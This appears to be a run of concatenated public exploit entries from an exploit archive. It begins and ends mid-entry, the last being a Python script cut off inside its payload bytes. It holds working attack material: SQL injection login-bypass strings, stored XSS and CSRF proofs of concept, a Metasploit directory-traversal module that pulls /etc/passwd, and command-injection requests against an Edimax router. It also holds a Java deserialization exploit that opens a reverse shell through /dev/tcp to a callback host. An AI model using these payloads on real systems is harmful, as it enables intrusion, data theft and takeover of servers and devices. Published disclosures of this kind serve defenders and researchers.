files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 - GET: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2 Reference(s): https://mahara_cms.localhost:8080/artefact/ https://mahara_cms.localhost:8080/artefact/file/ https://mahara_cms.localhost:8080/artefact/file/groupfiles.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: Insert user registration information to the DB without filtering. if(isset($_POST['signup'])) { $fname=$_POST['fname']; $lname=$_POST['lname']; $email=$_POST['email']; $password=$_POST['password']; $contact=$_POST['contact']; $enc_password=$password; $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno) values('$fname','$lname','$email','$enc_password','$contact')"); if($msg) { echo "<script>alert('Register successfully');</script>"; } } 2- In the admin dashboard: Get fullName from DB and print it without any filtering <?php $ret=mysqli_query($con,"select * from users"); $cnt=1; while($row=mysqli_fetch_array($ret)) {?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $row['fname'];?></td> <td><?php echo $row['lname'];?></td> <td><?php echo $row['email'];?></td> <td><?php echo $row['contactno'];?></td> <td><?php echo $row['posting_date'];?></td> </tr> 4- If we insert value of the "fname" as "script>prompt(1)</script>", we can perform this attack as "Stored XSS"

# Exploit Title: User Management System 2.0 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here (admin login: /admin/index.php): <?php session_start(); include("dbconnection.php"); if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="manage-users.php"; $_SESSION['login']=$_POST['username']; $_SESSION['id']=$num['id']; echo "<script>window.location.href='".$extra."'</script>"; exit(); } else { $_SESSION['action1']="*Invalid username or password"; $extra="index.php"; echo "<script>window.location.href='".$extra."'</script>"; exit(); } } 2- We can bypass authentication with SQLi: Bypass code (user and admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ...

# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: http://localhost/cms/users/registration.php 2- Vulnerable code: Insert user registration information to the DB without filtering. if(isset($_POST['submit'])) { $fullname=$_POST['fullname']; $email=$_POST['email']; $password=md5($_POST['password']); $contactno=$_POST['contactno']; $status=1; $query=mysqli_query($con,"insert into users(fullName,userEmail,password,contactNo,status) values('$fullname','$email','$password','$contactno','$status')"); $msg="Registration successfull. Now You can login !"; } ?> 3- In the admin dashboard: Get fullName from DB and print it without any filtering <tr> <td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td> </tr> 4- If we insert "fullName" as "script>prompt(2)</script>", we can perform this attack as "Stored XSS" 5- Picture in the Attachemnt ---------------------------------------------------

# Exploit Title: Complaint Management System 4.2 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: if(isset($_POST['submit'])) { $username=$_POST['username']; $password=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="change-password.php";// $_SESSION['alogin']=$_POST['username']; $_SESSION['id']=$num['id']; $host=$_SERVER['HTTP_HOST']; $uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); header("location:http://$host$uri/$extra"); exit(); } 2- We can bypass authentication with SQLi: Bypass code (admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ... -----------------------------------

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ************************************************* Detail: You can perform CSRF Attack for all the functions. ---------------------------------------------- CSRF PoC for Delete User ---------------------------------------------- This request performs over the GET request with uid. ------------------------------------------------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/cms/admin/manage-users.php"> <input type="hidden" name="uid" value="4" /> <input type="hidden" name="" value="" /> <input type="hidden" name="action" value="del" /> <input type="submit" value="Submit request" /> </form> </body> </html>

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Zen Load Balancer Directory Traversal", 'Description' => %q{ This module exploits a authenticated directory traversal vulnerability in Zen Load Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path. }, 'License' => MSF_LICENSE, 'Author' => [ 'Basim Alabdullah', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'References' => [ ['EDB', '48308'] ], 'DisclosureDate' => "Apr 10 2020" )) register_options( [ Opt::RPORT(444), OptBool.new('SSL', [true, 'Use SSL', true]), OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']), OptString.new('TARGETURI', [true, "The base URI path of the ZenConsole install", '/']), OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']), OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.cgi'), 'vars_get'=> { 'id' => '2-3', 'filelog' => "#{traversal}#{filename}", 'nlines' => '100', 'action' => 'See logs' }, 'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) }, 25) unless res && res.code == 200 print_error('Nothing was downloaded') return end print_good("#{peer} - Downloaded #{res.body.length} bytes") path = store_loot( 'zenload.http', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end

# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation # Date: 2020-04-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://kaasoft.pro/ # Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281 # Product Version: v2.2.0 # Product : Library CMS # Vulernability Type : Broken Authentication # Vulenrability : Session Fixation # CVE : N/A # Description : Session Fixation vulnerability has been discovered in v2.2.0 version of Library CMS Powerful Book Management System. Admin HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD Member HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 50 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD

# Title: Sky File 2.1.0 iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-21 # Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 # CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2207 Common Vulnerability Scoring System: ==================================== 7.2 Affected Product(s): ==================== Jin Chen Product: Sky File v2.1.0 - (iOS) Mobile Web Application (https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 Multiple persistent cross site scripting vulnerabilities has been discovered in the official Sky File v2.1.0 mobile ios web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The cross site vulnerability is located in the 'createFolder' module. Remote attackers with access to the ui via wifi are able to inject own malicious persistent script code to compromise the web-application or user credentials. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results session hijacking, persistent phishing, persistent external redirects and application-side manipulation of the web context of the affected and connected device module. 1.2 A directory traversal web vulnerability has been discovered in the official Sky File v2.1.0 mobile ios web-application. The web vulnerability allows an attacker to unauthorized change the path or directory to access sensitive application data. The directory / path webvulnerability is located in the local ftp server configuration and path validation with the insecure access permissions. Normally the anonymous user account is only able to move inside the main app folder but not above to the web-server and root application files. In case of the issue remote attackers are able to connect with anonymous user account credentials to the wifi ftp server. After that the attacker can use a misconfiguration in the ftp server of the app path to transmit a `/null//` path commands after CWD and CDUP navigation via ftp client. Thus allows the attacker to finally unauthorized access the main root application path. Successful exploitation of the directory traversal vulnerability results in unauthorized file system access and information disclosure. Proof of Concept (PoC): ======================= 1.1 The persistent script code inject vulnerability can be exploited by remote attackers with wifi network access with low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Payload %2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:10000/create Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Content-Length[140] Connection[keep-alive] POST-Daten: path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Connection[keep-alive] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/evil.source Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:10000/] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[GCDWebUploader] Connection[Close] 1.2 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the ftp preview the visible folders 2. Jump back to the the following path /private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ 3. Include the payload /(null)// and refresh via list command 4. You are now placed in an empty folder without permission to move 5. Add to /(null)/../ to the path and refresh the client 6. Path traversal successful to access the main app root path (./) that is normally not accessable 7. Successful reproduce of the path traversal web vulnerability! PoC: Payload /(null)// to /(null)/../ --- PoC Sessio Logs (FTP) --- [21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files [21:52:40] [R] 221 Thank you for using the FTP service on localhost. [21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) [21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 [21:52:42] [R] Connected to 192.168.2.116 [21:52:42] [R] 220 iosFtp server ready. [21:52:42] [R] USER anonymous [21:52:42] [R] 331 Password required for (null) [21:52:42] [R] PASS (hidden) [21:52:42] [R] 230 User (null) logged in. [21:52:42] [R] SYST [21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 [21:52:42] [R] FEAT [21:52:42] [R] 211-Features supported [21:52:42] [R] UTF8 [21:52:42] [R] 211 End [21:52:42] [R] OPTS UTF8 ON [21:52:42] [R] 200 Type set Opts to UTF8. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] CWD /(null)/ [21:52:42] [R] 550 CWD failed. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] PASV [21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) [21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 [21:52:42] [R] LIST -al [21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:42] [R] 226 Transfer complete. [21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) [21:52:43] [R] CDUP [21:52:43] [R] 250 CDUP command successful. [21:52:43] [R] PWD [21:52:43] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" is the current directory. [21:52:43] [R] PASV [21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) [21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 [21:52:43] [R] LIST -al [21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:43] [R] 226 Transfer complete. [21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) [21:52:43] [R] CDUP [21:52:44] [R] 250 CDUP command successful. [21:52:44] [R] PWD [21:52:44] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" is the current directory. [21:52:44] [R] PASV [21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) [21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 [21:52:44] [R] LIST -al [21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:44] [R] 226 Transfer complete. [21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) [21:53:34] [R] CDUP [21:53:34] [R] 250 CDUP command successful. [21:53:34] [R] PWD [21:53:34] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" is the current directory. [21:53:34] [R] PASV [21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) [21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 [21:53:34] [R] LIST -al [21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:34] [R] 226 Transfer complete. [21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) [21:53:35] [R] CDUP [21:53:35] [R] 250 CDUP command successful. [21:53:35] [R] PWD [21:53:35] [R] 257 "(null)" is the current directory. [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) [21:53:36] [R] CDUP [21:53:36] [R] 550 CDUP command failed. [21:53:41] [R] CWD /etc [21:53:41] [R] 250 CWD command successful. [21:53:41] [R] PWD [21:53:41] [R] 257 "(null)" is the current directory. [21:53:48] [R] CDUP [21:53:48] [R] 550 CDUP command failed. [21:53:51] [R] CWD / [21:53:51] [R] 250 CWD command successful. [21:53:51] [R] PWD [21:53:51] [R] 257 "/" is the current directory. [21:53:51] [R] PASV [21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) [21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 [21:53:51] [R] LIST -al [21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:51] [R] 226 Transfer complete. [21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) [21:54:02] [R] TYPE I [21:54:02] [R] 200 Type set to I. Listing Path ./root - Applications - bin - cores - developer - Library - private - sbin - System - usr - etc - var - tmp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation # Author: Besim ALTINOK # Vendor Homepage: https://www.espocrm.com # Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip # Version: v5.8.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------- Details: -------------------------------------------- 1- When we sent a request to the /api/v1/App/user, we can see user details --- First Request: --------------------------- GET /api/v1/App/user HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ************************* Authorization: Basic ************************************* Espo-Authorization: ************************************* Espo-Authorization-By-Token: true X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: auth-token-secret=cdc7f7*********************377; auth-username=user1; auth-token=3a874a********************************48 ---- 2- When we decode Basic Authorization and Espo-Authorization and change the value with another username (like admin) in the first request, we can see other user information and access like BOSS ---------- 3- Some Examples and encode technique - BASE64: First type: dXNlcjE6MQ== (user1:1) Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)

# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution # Date: 2020-04-23 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ------ NOTE: This device configurated with root permissions. So you can run the command as root Here is the detail(s) of the RCE(s) 1- Content of the mp.asp file <form action="/goform/mp" method="POST" name="mp"> <input type="text" name="command" value="">&nbsp;<input type="submit" value="GO"> <input type="hidden" name="getID" value="">&nbsp; <input type="hidden" name="getID" value="">&nbsp; </form> RCE Detail: ------------------------------- POST /goform/mp HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 command=||busybox+ls&getID= ------------------------------- 2- Content of the syscmd.asp <form action=/goform/formSysCmd method=POST name="formSysCmd"><table border=0 width="500" cellspacing=0 cellpadding=0> <tr><font size=2> This page can be used to run target system command.</tr> <tr><hr size=1 noshade align=top></tr> <tr> <td>System Command: </td> <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td> <td> <input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td></form> RCE Detail: ------------------------------- POST /goform/formSysCmd HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 sysCmd="command to here"

# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path # Date: 2020-04-24 # Vendor Homepage: https://getpopcorntime.is # Exploit Authors: Uriel Yochpaz & Jonatan Schor # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 6.2.1.14 and probably prior versions # Tested on: Windows 10, 7 # CVE : N/A [+] Description: Popcorn Time For Windows installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. [+] POC: C:\Users\User>sc qc "Update service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Update service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [+] Exploit: A successful attempt would require the local user to be able to insert their code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) folders undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution # Date: 2020-04-24 # Vendor Homepage: https://www.tecnoredsa.com.ar # Exploit Authors: LiquidWorm # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 2.8.1 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution # # # Vendor: Furukawa Electric Co., Ltd. | Tecnored SA # Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar # Affected version: APROS Evolution | 2.8.1 # FURUKAWA | 2.7.10 # ConsciusMAP | 2.6.4 # | 2.3.1 # | 2.1.49 # | 2.1.36 # | 2.1.31 # | 2.1.18 # | 2.1.16 # | 2.1.15 # | 2.1.1 # | 2.0.1174 # | 1.8 # | 1.4.70 # # Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored # provisioning system for FTTH networks. Complete administration of # your entire external FTTH network plant, including from the ONUs # installed in each end customer, to the wiring and junction boxes. # Unify all the management of your FTTH network on a single platform. # Unify all your data, whether from customers, your network, or the # external plant in one place. APROS FTTH allows you to manage your # entire FTTH network in a simple and globalized way with just one # click, without being a network expert. Includes services such as: # bandwidth limitation, Turbo Internet for time plans, BURST Internet, # QinQ for companies, and many more. General consumption graphics and # per customer in real time. Captive Portal for cutting or suspension # of the service. # # Desc: The FTTH provisioning solution suffers from an unauthenticated # remote code execution vulnerability due to an unsafe deserialization # of Java objects (ViewState) triggered via the 'javax.faces.ViewState' # HTTP POST parameter. The deserialization can cause the vulnerable JSF # web application to execute arbitrary Java functions, malicious Java # bytecode, and system shell commands with root privileges. # # =================================================================== # $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 # [*] Setting up valid URL path # [*] Starting callback listener child thread # [*] Starting handler on port 4444 # [*] Sending serialized object # [*] Connection from 172.16.0.1:48446 # [*] You got shell! # tomcat7@zslab:/var/lib/tomcat7$ id # uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) # tomcat7@zslab:/var/lib/tomcat7$ sudo su # id # uid=0(root) gid=0(root) grupos=0(root) # exit # tomcat7@zslab:/var/lib/tomcat7$ exit # *** Connection closed by remote host *** # =================================================================== # # Tested on: Apache Tomcat/7.0.68 # Apache Tomcat/7.0.52 # Apache MyFaces/2.2.1 # Apache MyFaces/2.1.17 # Apache MyFaces/2.0.10 # GNU/Linux 4.4.0-173 # GNU/Linux 4.4.0-137 # GNU/Linux 4.4.0-101 # GNU/Linux 4.4.0-83 # GNU/Linux 3.15.0 # GNU/Linux 3.13.0-32 # PrimeFaces/4.0.RC1 # Apache-Coyote/1.1 # ACC Library 3.1 # Ubuntu 16.04.2 # Ubuntu 14.04.2 # Java/1.8.0_242 # Java/1.8.0_181 # Java/1.8.0_131 # Java/1.7.0_79 # MySQL 5.7.29 # MySQL 5.7.18 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5565 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php # # CVE ID: CVE-2020-12133 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 # # # 24.02.2020 # import os############# import sys############ import gzip#######o### import zlib########### import socket######### import base64######### import urllib######### import requests####### import telnetlib###### import threading###### import subprocess##### from io import BytesIO from time import sleep from flash import blic class Optics: def __init__(self): self.callback = None# self.headers = None## self.payload = None## self.target = None### self.lport = None#### self.path = None##### self.cmd = None###### def allears(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(8) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) print("[+] Check your port mappings.") s.close() exit(0) break print("[*] You got shell!") # # UnicodeDecodeError dirty fix: # /usr/lib/python3.6/telnetlib.py # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) # telnetus.interact() conn.close() def thricer(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.allears) konac.start() sleep(1) self.gadget() def gadget(self): self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" self.cmd += self.callback self.cmd += "/" self.cmd += str(self.lport) self.cmd += "<&1" payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" payload += 